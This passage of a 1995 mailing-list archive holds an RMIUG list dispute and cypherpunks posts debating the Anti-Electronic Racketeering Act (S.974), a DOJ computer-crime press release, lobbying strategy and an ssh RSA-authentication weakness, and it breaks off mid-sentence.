From: jbass@dmsd.com (John L. Bass)
To: rmiug-discuss@xor.com
Subject: The legacy of Ted Smith's, Gary Anderson's, and Mary Newell's
    actions.


        The legacy of Ted Smith's, Gary Anderson's, Mary Newell's, and
possibly Scott Crawford's (since it was difficult to figure out which side
he was on) un-ethical postings combined with inaction of the elected and
natural leaders of RMIUG will reflect poorly on the group and it's leaders
for years to come.  This legacy includes the inaction of the entire readership
of rmiug-discuss as well (with the exception of Gabe who is a guest reader
from the east coast).

        Leadership has a number of grave responsibilities and difficult
choices - the foremost of which is the preservation of ethical and moral
behavior in the group - to protect the reputation of the BOTH group and it's
elected and natural leadership. In some instances, none of the available
options may be popular - but in-action is by far a greater failing.

        I deeply regret the events which have unfolded over the last
two weeks.  Making 10 of 31 posts in a group of 11 posters regarding
the MS topic of 6/29 should not be a capital offense. Nor should
questioning a board members assertions about the use of the list
in the face of historical usage. Nor should questioning the tollarance
of highly unethical private and public attacks upon posters. On the
29th I heeded Aleks request after reading it, and made a single additional
post. As Gabe noted, we were already winding the debate down. Unfortunately,
the several 1-2 hour delivery time of rmiug-discuss delayed Alek's comments.
I'm am deeply disappointed that the lessons learned from the last two weeks
have come at a great cost to all.  I am more concerned the examples set here
by Ted Smith, Gary Anderson, and  Mary Newell may greatly limit discussion
and participation in RMIUG.

        Each of you *IS* RMIUG. As a group your ethical, intellectual,
and moral guidance and leadership can not be ignored in difficult or
unpopular times.  Many have choosen in the last 3 days to vote with
their feet out of disgust. While they can distance themselves from the
unpleasant events this way, it is just another form of failing to take
more positive steps - maybe out of fear of being targeted themselves.

        I have many questions about why rmiug at nearly 700 people was
unable to maintain a higher level of content (and traffic) as a tool to
augment the learning curve of the many new comers to the internet, expand
the horizons of all, and form the dialog to bind the readership into
a effective functioning group. A highly sucessful topic in a large
diverse group this size will only have the interest of 10-30% of the
readership, just as the meetings do not benefit and attract the entire
group each month. A topic that produces content from 7 posters over
26 messages should not create a fire. A good highly successful topic
which really involves the readership, might draw comment from 1% of
the readership, some 60-70 people, and include maybe a hundred or
two posts. And several at the same time, even more.  Expecting the
ACCEPTABLE volume of the list to remain under 3-4 per day is a great
burden on the usefulness of this list.

        One difficultly has been that some readers use ISP's and BBS's
with extremely small quota's and read their mailbox's infrequently.
They have been extremely frustrated at their mbox/quota overflowing
from traffic around 50-100KB/wk. For others it has been the relatively
poor user interface of some mail readers which limits their ability
to select the articles they wish to read.  It is hard sometimes to
understand the small quota's in the face of disk space costing less
than $.30-.50/MB.  Maybe one project of this group should be to help
find/provide entry level members better access and tools at a nominal
or free cost.

        Dispite Ted Smith's slander and assertions to the contrary,
I bring some objectiveness and experience to issues many would prefer
to ignore.  I loathe the current PC vogue to avoid conflict at all costs
- - often with thick sarcasm and an unwillingness to listen to conflicting
view points.  I am direct, up front, listen well, accept  "constructive
criticism", and enjoy reasoned civil debate. I have the highest respect
for someone who can present/defend their views with a reasoned arguement
based upon fact and experience, and in the face of equally reasoned
arguements also based upon fact and experience, augment/change their
position or possibly agree to disagree when no common ground exists.

        I've been active some dozen times as the leading exec member of both
professional and civic orgs. I last ran a SF Bay area unix users group
known as UNIOPS/Silicon Valley Net(SVNet) for over 3 years almost single
handledly - including printing and addressing as much as 2000-4000 meeting
announcements for bulk mail each month.  With current and early breaking
topics and speakers I was often capacity limited by the 800 seat room ...
often standing room only.  When I moved it took me a year, and going dark
twice, before I could find a team willing to take over the burden and
continue what I had started.  Before that I ran two different groups with
semi-annual international Unix conferences with between 300 and 1000
attendees as "West Coast Unix Users Group" at SRI International
(formerly Standford Research Institute) and as UNIOPS (before helping
found /USR/GROUP now known as UNIFORM). I also spent two years on the
/usr/group UNIX standards committe as the "Extentions Sub-committe Chairman".
 Both concurrent and prior to that I did my duty as board member of several
Square Dance Clubs and Campus orgs. My public life has been second to my
family for the last 7 years.

        I suspect in part, the hostility here results from a previous
unpopular dispute where I called for the resignation of Guy Cook after
having CSN drop all the mail for dmsd.com on the floor for many weeks,
and then publicly deny that CSN had done so (as well as a number of
other management failings at CSN). Guy and CSN have come a long way
in the year and a half since, to become probably the best ISP in the
state. The road was rocky, but all have learned from the experience,
and I hope moved forward, including I.

John L. Bass

FYI: rmiug-discuss volume by day from 5/18 to present.


30 |-------+---------+---------+---------+----#----+------
   |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         |     
25 |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         |     
20 |-------+---------+---------+---------+---------+#-----
   |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         |     
15 |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         | #   
   |       |         |         |         |         |     
10 |-------+---------+---------+---------+---------+------
   |       #         |         |         |         |  #  
   |       |         |         |         |         |     
   |       |         |         |         |     #   |   # 
   |       |         |         #     #   |         |     
 5 |       |         |         |         |         #     
   |      #|# #      |         |#        |         |     
   | #   # |      ## |  #      |         |         |     #
   |       |   #     |#  ##    |      #  |   #    #|     
   |# ##   |         | #       |   #   # | #    #  |    #
 0 +----#--+-#--##--##-----####+-##-#---###-#----#-+------
    112222222222330000000001111111111222222222230000000001
    890123456789011234567890123456789012345678901234567890
    May           June                          July

    0000 0000 00  00     00    00  0 000   0 0300 00210000 Group `#'
    1211 3494 42  33  21322    64  1 621   1 2071 25029713 Volume


  *** You received this message because you are on an RMIUG email list   ***
  *** Send email to rmiug@rmiug.org for RMIUG & subscription information ***


----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 13 Jul 95 18:48:18 PDT
To: cypherpunks@toad.com
Subject: DOJ Press Release, S. 974?
Message-ID: <199507140148.VAA07551@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   It is not obvious that this refers to S. 974 but seems
   to be the press release John Noble cites on Cyberia-L.
   Did anyone see news reports on this?

   
   URL: gopher://justice2.usdoj.gov/00/press/previous/
   June95/370.txt


   For Immediate Release                                     
   AG
   Thursday, June 29, 1995
   (202) 616-2777
   TDD (202) 514-1888


                Administration, Congress Introduce
                  New Computer Crime Legislation

   Washington, D.C. -- Attorney General Janet Reno today
   announced that the Clinton Administration, along with
   Senators John Kyl, Patrick Leahy, and Charles Grassley has
   introduced legislation dramatically increasing federal
   protections of data confidentiality.  Current law protects
   the confidentiality of financial information.  Today's
   legislation would protect all government data against
   access without permission, as well as criminalizing access
   by government employees who exceed their authority to gain
   access to government data.

   "As technology advances, computer crime has grown," said
   Reno. "We have to ensure that the law keeps up with
   changing times."

   With the phenomenal growth of legitimate computer use has
   come a similar growth in computer crime and the problem of
   "hackers" who break into computer networks without
   authority to steal information or damage computer systems. 
   In addition to penetrating telephone networks to disrupt
   phone service and wiretap calls, many hackers attack
   government and private computers to steal valuable
   information.

   According to the Computer Emergency Response Team at
   Carnegie Mellon University, during the past four years, the
   number of reported intrusions on the Internet has increased
   498 percent, and the number of computer sites affected has
   increased 702 percent.

   "Computer crime is fast becoming everyone's problem," said
   Reno. "I'm encouraged that this bill is off to a bipartisan
   start, and I hope Congress will move quickly to enact it."

   The new Act provides three new tools to address this
   problem:

   +  More computers would be protected by federal law.  Under
      the new law, a "protected computer" would be defined as
      any government computer, financial institution computer,
      or any other computer used in interstate or foreign
      commerce or communications.  Under current law,
      computers are not adequately protected from foreign
      hackers, and no federal jurisdiction can be obtained
      when the hacker's and the victim's computers are located
      in the same state.

   +  Under the new law, all government data would be
      protected, and the federal government could prosecute
      individuals who access government data for their own
      use.  Additionally, private data would be protected when
      hackers steal information from computers located across
      state or national borders. Currently, only financial
      data and classified information are strictly protected
      from improper access.

   +  The integrity and availability of data would be better
      protected under the new law because it ensures that all
      hackers are punished adequately.  Current law provides
      penalties for intentional damage, but hackers who
      recklessly or accidently damage information or systems
      face little or no penalties.

                                ###

   95-370

[End press release]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 18:57:03 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Fight, or Roll Over?
In-Reply-To: <Pine.ULT.3.91.950713170704.14454B-100000@krypton.mankato.msus.edu>
Message-ID: <9507140155.AA13373@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"Robert A. Hayden" writes:
> On Thu, 13 Jul 1995, Douglas Barnes wrote:
> 
> > Since the Anti-Electronic Racketeering Act of 1995 might as well
> > be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
> > Tim throw in the towel already, when the bill hasn't even made it
> > through committee yet.
> 
> I don't think Tim threw in the towell on this bill, but has come to 
> realize that the overall war on privacy cannot be won by concentrating on 
> the individual battles.

Thats true. However, I think that one strategic move would be to get a
PR firm involved that is capable of severly embarassing any politico
who puts his name any of these proposals. After two or three of those
they start getting gunshy.

Folks, this isn't trivial. It isn't an easy thing to do by any
means. However, it is far from impossible.

> We've ALL got to take a deep breath and come up with a different
> plan of attack; a plan that the TLAs and spooks will be unable to
> defend against.

There is no such plan. They can't control the technology in the long
run but they can throw us all in jail in the short run. I have
substantial personal interest in keeping this stuff legal, and I don't
give a flying fig *who* sponsors legislation.

Do you think the agricultural industry lies down every time that
congress proposes to cut subsidies? Do you think that the gun lobby
lies down and plays dead? They get a bad bill proposed virtually every
week. Do you think the health care industry would have been correct to
say "oh, Hillary has us bushwacked -- this is a major
initiative. Guess we'd better give up."

Anyone who is saying that it is impossible to fight the legislative
battles hasn't been thinking. It takes millions of dollars,  but there
is a lot of money out there to be had in my opinion.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 19:04:34 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: Ssh security hole?
In-Reply-To: <199507132303.CAA18383@shadows.cs.hut.fi>
Message-ID: <9507140202.AA13400@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Tatu Ylonen writes:
> (I'll forward your message to a couple of lists where it might be
> of interest; the original message is at end.)
> 
> I think you are right in your analysis.  There is indeed a problem
> with RSA authentication.  Basically what this means is that if you log
> into a corrupt host, that host can at the same time log into another
> host with your account (by fooling you to answer to the request)
> provided that you use the same RSA identity for both hosts.
> 
> A workaround is to use a different identity for each host you use.
> The default identity can be specified on a per-host basis in the
> configuration file, or by -i options.

Might I suggest that a better solution would be to adapt the station
to station protocol, or, even better, Photuris...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: therogue@hopf.dnai.com (Eric Barnes)
Date: Thu, 13 Jul 95 22:09:00 PDT
To: ssteele@eff.org
Subject: Re: EFF analysis: Anti-Electronic Racketeering Act (S.974) (fwd)
Message-ID: <v01520d3eac2b45e2890c@[140.174.162.74]>
MIME-Version: 1.0
Content-Type: text/plain


Comments added by me to Grassley's speech.

Eric Barnes
>
>From: ssteele@eff.org (Shari Steele)
>
>*****  FEEL FREE TO DISTRIBUTE WIDELY  *****
>
>On June 27, Senator Grassley (R-Iowa) introduced the Anti-Electronic
>Racketeering Act, S.974.  The bill was designed "to prohibit certain acts
>involving the use of computers in the furtherance of crimes, and for other
>purposes."  Its immediate effect, among other things, would be to
>criminalize the posting of any encryption software on any computer network
>that foreign nationals can access (in other words, any computer network
>period).  Because of poor wording, the bill would probably also criminalize
>data compression and other non-cryptographic encoding schemes available on
>networks.  This includes the compression used in most of the images on
>Internet user's WWW homepages, not to mention uu and binhex encoding for
>transferring binary files via email, and even language encoding used to
>represent non-English characters, such as the SJIS scheme for representing
>Japanese characters.
>
>In addition, the bill seems to be directed at undermining two big fights
>we've successfully waged in the past:  the Steve Jackson Games decision
>against the United States Secret Service and the government's Clipper Chip
>proposal.
>
>Re:  Steve Jackson Games -- this bill would permit the government to avoid
>the notice requirements of the Privacy Protection Act if "there is reason
>to believe that the immediate seizure of such materials is necessary to
>prevent the destruction or altercation [very Freudian sic!] of such
>documents."  Furthermore, the government could use electronic evidence
>seized that had not been particularly described in a warrant if
>
>"the seizure is incidental to an otherwise valid seizure, and the
>government officer or employee-
>
>   ''(A) was not aware that work product material was among the data seized;
>
>   ''(B) upon actual discovery of the existence of work product materials, the
>government officer or employee took reasonable steps to protect the privacy
>interests recognized by this section, including-
>
>   ''(i) using utility software to seek and identify electronically stored data
>that may be commingled or combined with non-work product material; and
>
>   ''(ii) upon actual identification of such material, taking reasonable steps
>to protect the privacy of the material, including seeking a search warrant."
>
>Re:  Clipper Chip -- The bill would make it a crime "to distribute computer
>software that encodes or encrypts electronic or digital communications to
>computer networks that the person distributing the software knows or
>reasonably should know, is accessible to foreign nationals and foreign
>governments, regardless of whether such software has been designated as
>nonexportable."  However, there is an exception:  "It shall be an
>affirmative defense to prosecution under this section that the software at
>issue used a universal decoding device or program that was provided to the
>Department of Justice prior to the distribution."  This is essentially an
>attempt to sneak the key "escrow" provisions of the Clipper scheme in
>through a legislative back door.
>
>Fortunately, the bill does not have a very promising future.  The bill has
>no co-sponsors.  It was immediately referred to the Committee on the
>Judiciary, where it currently sits.  LEXIS's bill tracking report only
>gives it a 10% chance of passing out of the committee.
>
>I thought Senator Grassley's own statement when he introduced the bill is
>worth reading, so I'm attaching it here.  My favorite line is "Elliott Ness
>needs to meet the Internet."  This is especially ironic in light of recent
>comparisons of hysteria about "dangerous" material on the internet, and
>Prohibition.
>
>The bill itself follows.
>Shari
>
>>------------------------------------------------------------------------
>>Shari Steele, Director of Legal Services                 ssteele@eff.org
>>Electronic Frontier Foundation                      202/861-7700 (voice)
>>1667 K Street, N.W., Suite 801                        202/861-1258 (fax)
>>Washington, DC  20006-1605                            202/861-1224 (BBS)
>>
>>
>>
>>----------  Senator Grassley's Statement to the Senate  ----------
>>
>>   Mr. President, I rise this evening to introduce the Anti-electronic
>>Racketeering Act of 1995. This bill makes important changes to RICO and
>>criminalizes deliberately using computer technology to engage in criminal
>>activity. I believe this bill is a reasonable, measured and strong response
>>to a growing problem.  According to the computer emergency and response
>>team at Carnegie-Mellon University, during 1994, about 40,000 computer
>>users were attacked. Virus hacker, the FBI's national computer crime squad
>>has investigated over 200 cases since 1991. So, computer crime is clearly
>>on the rise.
>*Was this not the same Carnegie-Mellon University involved in the horrific
>Time Ragazine "Cyberporn" article?  The one which will take no
>responsibility for the incredibly poor research done by one of their
>undergraduates?  Which seems to take no stand on proper research procedures
>used by their students?
>>
>>   Mr. President, I suppose that some of this is just natural. Whenever man
>>develops a new technology, that technology will be abused by some. And that is
>>why I have introduced this bill. I believe we need to seriously reconsider the
>>Federal Criminal Code with an eye toward modernizing existing statutes and
>>creating new ones. In other words, Mr. President, Elliot Ness needs to
>>meet the
>>Internet.
>*Being a politician, of course he considers criminality natural.  It goes
>with the territory.  And like so many of them, drunk with their potential
>power over the people (Dear God, let us no longer speak of "servants of the
>People), attacking every single user of computers, world wide at that, is
>also a "natural" response.
>>
>>   Mr. President, I sit on the Board of the Office of Technology Assessment.
>>That Office has clearly indicated that organized crime has entered
>>cyberspace in
>>a big way. International drug cartels use computers to launder drug money and
>>terrorists like the Oklahoma City bombers use computers to conspire to commit
>>crimes.
>*Ah..and notice how he carefully leaves out any empirical data?  This
>Board, whatever the hell it is, "has clearly indicated" something...which
>just happens to fit in with Grassley's political ambitions and desperate
>need to be the center of attention.  And so he raises the unfounded
>"organized crime" and "terrorist" and "conspiracy" flags to frighten us
>all.  And to make matters truly worse, there is no evidence or indication
>that the Internet was even used in the OK City debacle, much less
>encryption.  As a matter of fact, our vaunted FBI has yet to even bring an
>indictment in the case!
>>
>>   Computer fraud accounts for the loss of millions of dollars per year.
>*Mostly through the use of bank wires...not available to the rest of us.
>
> And often times, there is little that can be done about this because the
>computer
>>used to commit the crimes is located overseas. So, under my bill, overseas
>>computer users who employ their computers to commit fraud in the United States
>>would be fully subject to the Federal criminal laws.  Also under my bill, Mr.
>>President, the wire fraud statute which has been successfully used by
>>prosecutors for many users, will be amended to make fraudulent schemes
>>which use
>>computers a crime.
>*I can see it now.  You typed a letter on a computer?  You're dead,
>buddy!!!  And anyone who happened to have received that letter, whether
>involved or not, would also be guilty by association.  Good going,
>Grassley.  Fine grasp of the Constitution there.
>>
>>   It is not enough to simply modernize the Criminal Code. We also have to
>>reconsider many of the difficult procedural burdens that prosecutors must
>>overcome. For instance, in the typical case, prosecutors must identify a
>>location in order to get a wiretapping order. But in cyberspace, it is often
>>impossible to determine the location. And so my bill corrects that so that if
>>prosecutors cannot, with the exercise of effort, give the court a
>>location, then
>>those prosecutors can still get a wiretapping order. And for law
>>enforcers-both
>>State and Federal-who have seized a computer which contains both contraband or
>>evidence and purely private material, I have created a good-faith standard so
>>that law enforcers are not shackled by undue restrictions but will also be
>>punished for bad faith.
>*Oh, Dear God!  He's gonna protect us from the enforcers.  How terribly kind.
>>
>>   Mr. President, this brave new world of electronic communications and global
>>computer networks holds much promise. But like almost anything, there is the
>>potential for abuse and harm. That is why I urge my colleagues to support this
>>bill and that is why I urge industry to support this bill.
>*Oh, yes...let's be sure that any promise is nipped in the bud as our
>sacred government, which has shown such a dandy predilection for abuse of
>power through the years, is given accerss to any and all private
>communications, no matter from whom or to whom.  With a Senator like this,
>who needs a Fuhreur?  I hope Iowans take a long look at this idiot next
>time the ballots are being cast.
>>
>>   On a final note, I would say that we should not be too scared of
>>technology.
>>After all, we are still just people and right is still right and wrong is
>>still
>>wrong. Some things change and some things do not. All that my bill does is say
>>you can't use computers to steal, to threaten others or conceal criminal
>>conduct.
>*And this chump is willing to flush the entire Constitution down the toilet
>in order to save us all from that which can, and will, be done by many
>other means.  Notice his "all my bill does", then defines what he wants us
>to believe.  And this is one of the Republicans who has promised to get the
>Federal government off our backs?  Oh, yes, there *is* a Santa Claus,
>Virginia.  But be very careful of his hands when he gives you that fatherly
>hug.  This one will rape us all if given the chance!
>
>Eric Barnes
>>
>>   Mr. President, I ask unanimous consent that the text of the bill be printed
>>in the Record.
>>
>>   There being no objection, the bill was ordered to be printed in the Record,
>>as follows:
>>
>>   S. 974
>>
>>
>>
>>   SECTION 1. SHORT TITLE.
>>
>>   This Act may be cited as the ''Anti-Electronic Racketeering Act of 1995''.
>>
>>   SEC. 2. PROHIBITED ACTIVITIES.
>>
>>   (a) Definitions .-Section 1961(1) of title 18, United States Code, is
>>amended-
>>
>>   (1) by striking ''1343 (relating to wire fraud)'' and inserting ''1343
>>(relating to wire and computer fraud)'';
>>
>>   (2) by striking ''that title'' and inserting ''this title'';
>>
>>   (3) by striking ''or (E)'' and inserting ''(E)''; and
>>
>>   (4) by inserting before the semicolon the following: ''or (F) any act
>>that is
>>indictable under section 1030, 1030A, or 1962(d)(2)''.
>>
>>   (b) Use of Computer To Facilitate Racketeering Enterprise .-Section 1962 of
>>title 18, United States Code, is amended-
>>
>>   (1) by redesignating subsection (d) as subsection (e); and
>>
>>   (2) by inserting after subsection (c) the following new subsection:
>>
>>   ''(d) It shall be unlawful for any person-
>>
>>   ''(1) to use any computer or computer network in furtherance of a
>>racketeering activity (as defined in section 1961(1)); or
>>
>>   ''(2) to damage or threaten to damage electronically or digitally stored
>>data.''.
>>
>>   (c) Criminal Penalties .-Section 1963(b) of title 18, United States
>>Code, is
>>amended-
>>
>>   (1) by striking ''and'' at the end of paragraph (1);
>>
>>   (2) by striking the period at the end of paragraph (2) and inserting '';
>>and''; and
>>
>>   (3) by adding at the end the following new paragraph:
>>
>>   ''(3) electronically or digitally stored data.''.
>>
>>   (d) Civil Remedies .-Section 1964(c) of title 18, United States Code, is
>>amended by striking ''his property or business''.   [*S9181]
>>
>>   (e) Use as Evidence of Intercepted Wire or Oral Communications
>>.-Section 2515
>>of title 18, United States Code, is amended by inserting before the period at
>>the end the following: '', unless the authority in possession of the
>>intercepted
>>communication attempted in good faith to comply with this chapter. If the
>>United
>>States or any State of the United States, or subdivision thereof, possesses a
>>communication intercepted by a nongovernmental actor, without the knowledge of
>>the United States, that State, or that subdivision, the communication may be
>>introduced into evidence''.
>>
>>   (f) Authorization for Interception of Wire, Oral, or Electronic
>>Communications .-Section 2516(1) of title 18, United States Code, is amended-
>>
>>   (1) by striking ''and'' at the end of paragraph (n);
>>
>>   (2) by striking the period at the end of paragraph () and inserting '';
>>and''; and
>>
>>   (3) by adding at the end the following new paragraph:
>>
>>   ''(p) any violation of section 1962 of title 18.''.
>>
>>   (g) Procedures for Interception .-Section 2518(4)(b) of title 18, United
>>States Code, is amended by inserting before the semicolon the following: ''to
>>the extent feasible''.
>>
>>   (h) Computer Crimes .-
>>
>>   (1) New prohibited activities .-Chapter 47 of title 18, United States Code,
>>is amended by adding at the end the following new section:
>>
>>   '' 1A1030A. Racketeering-related crimes involving computers
>>
>>   ''(a) It shall be unlawful-
>>
>>   ''(1) to use a computer or computer network to transfer unlicensed computer
>>software, regardless of whether the transfer is performed for economic
>>consideration;
>>
>>   ''(2) to distribute computer software that encodes or encrypts
>>electronic or
>>digital communications to computer networks that the person distributing the
>>software knows or reasonably should know, is accessible to foreign
>>nationals and
>>foreign governments, regardless of whether such software has been
>>designated as
>>nonexportable; and
>>
>>   ''(3) to use a computer or computer network to transmit a communication
>>intended to conceal or hide the origin of money or other assets, tangible or
>>intangible, that were derived from racketeering activity; and
>>
>>   ''(4) to operate a computer or computer network primarily to facilitate
>>racketeering activity or primarily to engage in conduct prohibited by
>>Federal or
>>State law.
>>
>>   ''(b) For purposes of this section, each act of distributing software is
>>considered a separate predicate act. Each instance in which nonexportable
>>software is accessed by a foreign government, an agent of a foreign
>>government,
>>a foreign national, or an agent of a foreign national, shall be
>>considered as a
>>separate predicate act.
>>
>>   ''(c) It shall be an affirmative defense to prosecution under this section
>>that the software at issue used a universal decoding device or program
>>that was
>>provided to the Department of Justice prior to the distribution.''.
>>
>>   (2) Clerical amendment .-The analysis at the beginning of chapter 47,
>>United
>>States Code, is amended by adding at the end the following new item:
>>
>>   ''1030A. Racketeering-related crimes involving computers.''.
>>
>>   (3) Jurisdiction and venue .-Section 1030 of title 18, United States
>>Code, is
>>amended by adding at the end the following new subsection:
>>
>>   ''(g)(1)(A) Any act prohibited by this section that is committed using any
>>computer, computer facility, or computer network that is physically located
>>within the territorial jurisdiction of the United States shall be deemed
>>to have
>>been committed within the territorial jurisdiction of the United States.
>>
>>   ''(B) Any action taken in furtherance of an act described in
>>subparagraph (A)
>>shall be deemed to have been committed in the territorial jurisdiction of the
>>United States.
>>
>>   ''(2) In any prosecution under this section involving acts deemed to be
>>committed within the territorial jurisdiction of the United States under this
>>subsection, venue shall be proper where the computer, computer facility, or
>>computer network was physically situated at the time at least one of the
>>wrongful acts was committed.''.
>>
>>   (i) Wire and Computer Fraud .-Section 1343 of title 18, United States Code,
>>is amended by striking ''or television communication'' and inserting
>>''television communication, or computer network or facility''.
>>
>>   (j) Privacy Protection Act .-Section 101 of the Privacy Protection Act of
>>1980 (42 U.S.C. 2000aa) is amended-
>>
>>   (1) in subsection (a)-
>>
>>   (A) by striking ''or'' at the end of paragraph (1);
>>
>>   (B) by striking the period at the end of paragraph (2) and inserting '';
>>or''; and
>>
>>   (C) by adding at the end the following new paragraph:
>>
>>   ''(3) there is reason to believe that the immediate seizure of such
>>materials
>>is necessary to prevent the destruction or altercation of such
>>documents.''; and
>>
>>   (2) in subsection (b)-
>>
>>   (A) by striking ''or'' at the end of paragraph (3);
>>
>>   (B) by striking the period at the end of paragraph (4) and inserting '';
>>or''; and
>>
>>   (C) by adding at the end the following new paragraph:
>>
>>   ''(5) in the case of electronically stored data, the seizure is
>>incidental to
>>an otherwise valid seizure, and the government officer or employee-
>>
>>   ''(A) was not aware that work product material was among the data seized;
>>
>>   ''(B) upon actual discovery of the existence of work product materials, the
>>government officer or employee took reasonable steps to protect the privacy
>>interests recognized by this section, including-
>>
>>   ''(i) using utility software to seek and identify electronically
>>stored data
>>that may be commingled or combined with non-work product material; and
>>
>>   ''(ii) upon actual identification of such material, taking reasonable steps
>>to protect the privacy of the material, including seeking a search
>>warrant.''.
>
>Eric Barnes - TheRogue@dnai.com
>PO Box 27507, San Francisco, CA 94127
>Corporate Spokesman, Specialist in "Attack Public
>Relations", Unique Marketing Solutions.
>"You have to give up the life you planned, to find
>the one that's waiting for you." - Sally Field

Eric Barnes - TheRogue@dnai.com
PO Box 27507, San Francisco, CA 94127
Corporate Spokesman, Specialist in "Attack Public
Relations", Unique Marketing Solutions.
"You have to give up the life you planned, to find
the one that's waiting for you." - Sally Field






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 19:24:19 PDT
To: cypherpunks@toad.com
Subject: Re: Fight, or Roll Over?
In-Reply-To: <ac2af3ed010210041c19@[205.199.118.202]>
Message-ID: <9507140224.AA13439@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Someone says:
> By causing us to go into paroxysms of activity every time they throw a new
> piece of legislation over the transom, we dissipate our efforts in more
> promising areas.

Er, heh?

1) 95% of the people on this list write no code and participate in no
   design activities, so they have no efforts to dissipate.
2) If there was a lobbying effort, the most participation anyone in
   the "we" above would end up doing is throwing cash at some
   Washington firm. I doubt that anyone would be involved directly, so
   how does this "disspiapate our efforts"?
3) What you mean "we", kimosabe?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 13 Jul 95 19:27:17 PDT
To: cypherpunks@toad.com
Subject: Re: Root Causes
Message-ID: <199507140224.WAA05123@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199507140151.UAA01504@arnet.arn.net>, merriman@arn.net (David
K. Merriman) wrote:

>-----BEGIN PGP SIGNED MESSAGE-----
>
>While I respect the ideas and opinions submitted by the majority of the
>members of this list, I wonder if perhaps we're failing to deal with the
>_root_ problem of such things as the CDA, Clipper, DTA, etc.
>
>Specifically, I wonder if it wouldn't be a better approach to *prevent* such
>measures from ever being proposed in the first place.

Short of a 50 kilo ton bomb on Washington, I don't see any way that could
be accomplished.
<No, I don't advocate nuking DC.>

>Is there any precedence or possibility of either filing civil or criminal
>charges against a Government official for their _official_ actions?
>Something that will not only make for some Serious Press, but hit them from
>an unexpected angle?

You can't sue the government without its prior consent. Government
officials are also usually immune from being sued over their official
actions.

>It would seem that things such as the CDA, etc, are patent violations of the
>Bill of Rights. As such, wouldn't the Congressrodent(s) proposing such
>measures be violating our civil rights, and thus be criminally liable?
>Aren't Congressrodents supposed to take an Oath of Office that involves
>upholding the Constitution?

The oath is not ment to be kept. It's sole purpose is to provide a photo
op for the incomming congresscritters.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAXVPioZzwIn1bdtAQFp5gF/WnEoNO15G11gXi9G/BmtFzu/toHZPBmj
ldONnU+mbB5c9LIGeJH3usQZLdT/D4Sw
=NpN9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 13 Jul 95 19:27:31 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: co-sponsors S.974
In-Reply-To: <199507140100.VAA00681@pipe4.nyc.pipeline.com>
Message-ID: <9507140227.AA13589@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Shari Steele writes, re: S.974, the Anti-Electronic Racketeering Act 
[via gnu, on the cypherpunks list]:
# Fortunately, the bill does not have a very promising
# future.  The bill has  no co-sponsors.  

James R. Coleman (or John Noble ?  screwed up attributions) writes
[via jya, on cyberia-l]:
> The bill was co-sponsored by Sens. Kyl (R-AZ) and Leahy
> (D-VT). It has the enthousiastic support of the
> administration. In a DOJ press release  following its
> introduction, AG Reno is quoted as saying "computer crime
> is fast becoming everyone's problem. I'm encouraged that
> this bill is off to a  bipartisan start, and I hope
> Congress will move quickly to enact it." 

I think I can settle the confusion about who's sponsoring what in the Senate. 

The bill described by Coleman ? Noble ?
on cyberia-l appears to be S.982, the National Information Infrastructure 
Protection Act of 1995. According to Thomas (http://thomas.loc.gov), this bill
was introduced in the Senate on June 29th (not 27th), and is cosponsored by,
you guessed it, Sens. Kyl, Leahy, & Grassley. It mainly consists of a
section entitled "Computer Crime", which sets penalties for breaking into
systems, "damaging" data, systems, etc., ad nauseum.

(This is why they give bills *numbers*, folks :)

Here's an excerpt from Sen Leahy's introductory remarks for S.982 in the
Congressional Record: 
 --- begin excerpts ---
[...]
This bill will increase protection
for both government and private computers, and the information
on those computers, from the growing threat of computer crime.

We increasingly depend on the availability, integrity, and
confidentiality of computer systems and information to conduct our
business, communicate with our friends and families, and even to
be entertained.
[...]
Second, the bill would increase protection for the privacy and
confidentiality of computer information. Recently, computer hackers
have accessed sensitive data regarding Operation Desert

Storm, penetrated NASA computers, and broken into Federal
courthouse computer systems containing confidential records. Others
have abused their privileges on Government computers by snooping
through confidential tax returns, or selling confidential criminal
history information from the National Crime Information Center.

The bill would criminalize these activities by making all those who
